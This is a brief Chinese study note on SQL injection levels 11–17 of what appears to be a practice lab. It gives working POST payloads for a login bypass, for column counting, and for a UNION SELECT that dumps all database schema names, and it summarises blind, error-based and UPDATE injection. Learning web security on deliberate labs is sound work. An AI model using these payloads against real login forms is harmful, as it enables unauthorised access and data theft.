写的可能不太详细,详细请看https://www.cnblogs.com/-qing-/p/11610385.html#_lab2_0_0
友情提醒:发送数据请求不要乱加空格,否则结果可能显示不出来
十一关
uname=admin' order by 2#&passwd=1&submit=Submit //判断列数
uname=admin' or '3'='3' #&passwd=1&submit=Submit
uname=-qing' union select 1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)##&passwd=1&submit=Submit//爆全部数据
十二关
只是与上一关的闭合符号有区别
十三关
看源码之后知道他是注释符号
得不出数据来,直接用报错函数来做
十四关 与上一关的区别就是闭合符号,不多说了
十五关 单引号闭合的布尔盲注
十六关 闭合符号的区别
十七关 update的注入
